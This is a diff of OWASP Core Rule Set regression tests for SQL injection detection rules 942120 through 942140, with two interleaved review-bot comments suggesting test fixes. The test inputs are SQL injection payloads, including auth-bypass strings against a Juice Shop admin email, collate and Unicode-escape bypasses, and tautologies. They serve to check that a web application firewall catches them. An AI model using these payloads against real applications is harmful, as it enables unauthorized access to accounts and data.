- test_title: 942120-15 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "RLIKE" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-16 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "RLIKE" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-16 desc: "SQL Injection Attack: SQL Operator 
Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "<>" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-17 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "<>" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-17 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "+in+%28++select+anfrage_id+from+erkenntnisse+where+id+is++not++null++%29%0A" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-18 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "+in+%28++select+anfrage_id+from+erkenntnisse+where+id+is++not++null++%29%0A" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-18 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "+IN+%28815914%2C+815913%29%0A" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-19 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "+IN+%28815914%2C+815913%29%0A" + version: HTTP/1.0 + output: + log_contains: id 
"942120" + - test_title: 942120-19 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "+IN+%28815919%2C+815920%2C+815921%2C+815922%2C+815923%2C+815924%2C+815925%2C+815926%2C+815927%2C+815928%2C+815929%2C+815930%2C+815932%2C+815933%2C+815934%2C+815935%2C+815936%2C+815937%2C+815917%2C+815918%29%0A" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-20 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "+IN+%28815919%2C+815920%2C+815921%2C+815922%2C+815923%2C+815924%2C+815925%2C+815926%2C+815927%2C+815928%2C+815929%2C+815930%2C+815932%2C+815933%2C+815934%2C+815935%2C+815936%2C+815937%2C+815917%2C+815918%29%0A" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-20 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay= in ( Aa,- Ab-, and Ac)" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-21 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay= in ( Aa,- Ab-, and Ac)" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-21 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "%3E%3D" - version: HTTP/1.0 - output: - log_contains: id "942120" + - 
stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "%3E%3D" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-22 + desc: "SQL Injection Attack: not between * and " + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "select%20*%20from%20user%20where%20password_last_changed%20not%20between%20'2021-04-11'%20and%20'2021-04-11'" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-23 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=z'or%20email%20notnull--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-24 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=x'%20or%20username%20like%20totpSecret%20escape%20'x';" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-25 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=admin%40juice-sh.op'%20and%20email%20ilike%20email--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-26 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=admin%40juice-sh.op'%20and%20email%20%3d%20all%20(select%20email)--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-27 + desc: "SQLite collate nocase" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=user'collate%20nocase--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-28 + desc: "SQLite collate nocase" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=user'collate%20nocase--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-29 + desc: "SQL collate`nocase`" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=user'collate%60nocase%60--" + version: HTTP/1.0 + output: + 
log_contains: id "942120" + - test_title: 942120-30 + desc: "Invalid SQL collate foo" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=user'collate%20foo--" + version: HTTP/1.0 + output: + no_log_contains: id "942120" + - test_title: 942120-31 + desc: "Invalid SQL collate foo" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + # collate`utf8mb4_general_ci` + data: "var=user'collate%60utf8mb4_general_ci%60--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-32 + desc: "Collate bypass with character escaping" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + # collate"\utf8mb4_general_ci" + data: "var=user'collate%22%5Cutf8mb4_general_ci%22--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-33 + desc: "Collate bypass with postgress string escaping U&" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + # collate U&"\0441\043B\043E\043D" + data: "var=user'collate U%26%22%241%23B%23E%23D%22--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-34 + desc: "Detect auth bypass email=' notnull --" + stages: + - 
stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=%27%20notnull%20--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-35 + desc: "Test for IJ5N1CXB - unlikely" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op'and%20unlikely%20(id)--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-36 + desc: "Negative test for IJ5N1CXB - unlikely" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: + text=It is highly unlikely this is going to be a false positive + version: HTTP/1.0 + output: + no_log_contains: id "942120" + - test_title: 942120-37 + desc: "Test for HOH7M88Q - likelihood" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: | + email=admin%40juice-sh.op\'%20and(%20likelihood%20(id,.0));' + version: HTTP/1.1 + output: + log_contains: id "942120" + - test_title: 942120-38 + desc: "Negative test for HOH7M88Q - likelihood" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: | + text=After calculating the likelihood this should not be matched. + version: HTTP/1.1 + output: + no_log_contains: id "942120" + - test_title: 942120-39 + desc: "Detect path-based SQLi attempt" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: POST + uri: "/catalogue/rest/products/2499999||this.product/reviews" + version: HTTP/1.0 + output: + log_contains: id "942120" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml index 9debe118c9..0056a00671 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml 
@@ -1,128 +1,160 @@ --- - meta: - author: "Christian S.J. Peron and Allan Boll" - description: None - enabled: true - name: 942130.yaml - tests: - - - test_title: 942130-1 +meta: + author: "Christian S.J. Peron and Allan Boll, Franziska Bühler" + description: None + enabled: true + name: 942130.yaml +tests: + - test_title: 942130-1 desc: "SQL Injection Attack: SQL Tautology" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "var=%221%22%20sSOUNDS%20LIKE%20%22SOUNDS%20LIKE%201&other_var=test" - version: HTTP/1.0 - output: - no_log_contains: id "942130" - - - test_title: 942130-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: /post + data: "var=%221%22%20sSOUNDS%20LIKE%20%22SOUNDS%20LIKE%201&other_var=test" + version: HTTP/1.0 + output: + no_log_contains: id "942130" + - test_title: 942130-2 desc: "SQL Injection Attack: SQL Tautology" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - uri: "/?a=1=1" - version: HTTP/1.1 - output: - log_contains: id "942130" - - - test_title: 942130-3 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=1=1" + version: HTTP/1.1 + output: + log_contains: id "942130" + - test_title: 942130-3 desc: "SQL Injection Attack: SQL Tautology" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - uri: "/?a=11=1" - version: HTTP/1.1 - output: - no_log_contains: id "942130" - - - test_title: 942130-4 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test 
agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=11=1" + version: HTTP/1.1 + output: + no_log_contains: id "942130" + - test_title: 942130-4 desc: "SQL Injection Attack: SQL Tautology" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - uri: "/?a=1=11" - version: HTTP/1.1 - output: - no_log_contains: id "942130" - - - test_title: 942130-5 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=1=11" + version: HTTP/1.1 + output: + no_log_contains: id "942130" + - test_title: 942130-5 desc: "SQL Injection Attack: SQL Tautology" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - uri: "/?a=11!=1" - version: HTTP/1.1 - output: - log_contains: id "942130" - - - test_title: 942130-6 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=11!=11" + version: HTTP/1.1 + output: + no_log_contains: id "942130" + - test_title: 942130-6 desc: "SQL Injection Attack: SQL Tautology" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - uri: "/?a=1!=11" - version: HTTP/1.1 - output: - log_contains: id "942130" - - - test_title: 942130-7 - desc: "SQL Injection Attack: SQL Tautology" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=b,1=1" + version: HTTP/1.1 + output: + 
log_contains: id "942130" + - test_title: 942130-7 + desc: "SQL Injection Attack: SQL Tautology - like" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - uri: "/?a=11!=11" - version: HTTP/1.1 - output: - no_log_contains: id "942130" - - - test_title: 942130-8 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "a=42%20like%2042" + version: HTTP/1.1 + output: + log_contains: id "942130" + - test_title: 942130-8 desc: "SQL Injection Attack: SQL Tautology" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - uri: "/?a=b,1=1" - version: HTTP/1.1 - output: - log_contains: id "942130" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=This%20is%20like%20no%20other" + version: HTTP/1.1 + output: + no_log_contains: id "942130" + - test_title: 942130-9 + desc: "SQL Injection Attack: SQL Tautology using MySQL NULL-safe operator <=>" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=42<=>42" + version: HTTP/1.1 + output: + log_contains: id "942130" + - test_title: 942130-10 + desc: "SQL Injection Attack: SQL Tautology using glob" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: 
"/?user=admin%40juice-sh.op'%20and%20password%20glob%20password;" + version: HTTP/1.1 + output: + log_contains: id "942130" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml new file mode 100644 index 0000000000..934a8ac847 --- /dev/null +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml 
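Review bot: Test 942130-10 is the only stage in this file whose request was not moved to the `/get` endpoint; every other GET stage in the hunk now uses `uri: "/get?…"`, so this one should read `uri: "/get?user=admin%40juice-sh.op'%20and%20password%20glob%20password;"` for consistency (and so the request hits the same backend path the other stages exercise). Test 942130-9 sends the NULL-safe operator raw in the query string, `uri: "/get?a=42<=>42"`, while comparable operator tests in 942120 percent-encode their payloads; if the runner does not encode the URI itself, an intermediary may reject or normalise the raw `<`/`>` before the rule sees it, so `a=42%3C%3D%3E42` would be the safer form — unverified, since the runner's encoding behaviour is not visible here. The meta block still carries `description: None`, whereas the new sibling file 942131.yaml sets a real description; `description: SQL Tautology` would make the two consistent.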
@@ -0,0 +1,114 @@ +--- +meta: + author: "Felipe Zipitria" + description: SQL Tautology + enabled: true + name: 942131.yaml +tests: + - test_title: 942131-1 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=11!=1" + version: HTTP/1.1 + output: + log_contains: id "942131" + - test_title: 942131-2 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=1!=11" + version: HTTP/1.1 + output: + log_contains: id "942131" + - test_title: 942131-3 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=11!=11" + version: HTTP/1.1 + output: + no_log_contains: id "942131" + - test_title: 942131-4 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=1%20is%20not%202" + version: HTTP/1.1 + output: + log_contains: id "942131" + - test_title: 942131-5 + desc: "SQL Injection Attack: SQL Tautology negative" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=1%20is%20not%201" + version: HTTP/1.1 + output: + no_log_contains: id "942131" + - test_title: 942131-6 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "a='1' not regexp '2'" + version: HTTP/1.1 + output: + log_contains: id "942131" + - test_title: 942131-7 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "a='1' not regexp '1'" + version: HTTP/1.1 + output: + no_log_contains: id "942131" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml index 0a86fb9fec..1cdc7b6634 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml 
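Review bot: The only negative test for the `is not` form (942131-5, `a=1%20is%20not%201`) still looks like SQL, so the file has no false-positive guard for the far more common natural-language case, unlike 942130-8 which does this for `like`. A mirror of 942131-5 with `uri: "/get?a=This%20is%20not%20a%20tautology"` and `no_log_contains: id "942131"` would pin that benign prose is not matched by the new rule. The same gap exists for `not regexp` (942131-7 only varies the operands), though prose containing that phrase is rarer, so that one is optional.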
@@ -1,295 +1,295 @@ --- - meta: - author: "Christian S.J. Peron, Christoph Hansen" - description: None - enabled: true - name: 942140.yaml - tests: - - - test_title: 942140-1 +meta: + author: "Christian S.J. Peron, Christoph Hansen" + description: None + enabled: true + name: 942140.yaml +tests: + - test_title: 942140-1 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - uri: "/?sql_table=pg_catalog" - version: HTTP/1.0 - output: - log_contains: id "942140" - - - test_title: 942140-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?sql_table=pg_catalog" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-2 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "INFORMATION_SCHEMA" - version: HTTP/1.0 - output: - log_contains: id "942140" - - - test_title: 942140-3 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "INFORMATION_SCHEMA" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-3 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "database(" - version: HTTP/1.0 - output: - log_contains: id "942140" - - - test_title: 942140-4 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test 
agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "database(" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-4 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "db_name(" - version: HTTP/1.0 - output: - log_contains: id "942140" - - - test_title: 942140-5 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "db_name(" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-5 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "DaTaBasE(" - version: HTTP/1.0 - output: - log_contains: id "942140" - - - test_title: 942140-6 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "DaTaBasE(" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-6 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "InFoRmaTioN_ScHemA" - version: HTTP/1.0 - output: - log_contains: id "942140" - - - test_title: 942140-7 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "InFoRmaTioN_ScHemA" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-7 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "DB_NAME(" - version: HTTP/1.0 - output: - log_contains: id "942140" - - - test_title: 942140-8 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "DB_NAME(" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-8 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "tempdb" - version: HTTP/1.0 - output: - log_contains: id "942140" - - - test_title: 942140-9 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "tempdb" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-9 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "msdb" - version: HTTP/1.0 - output: - 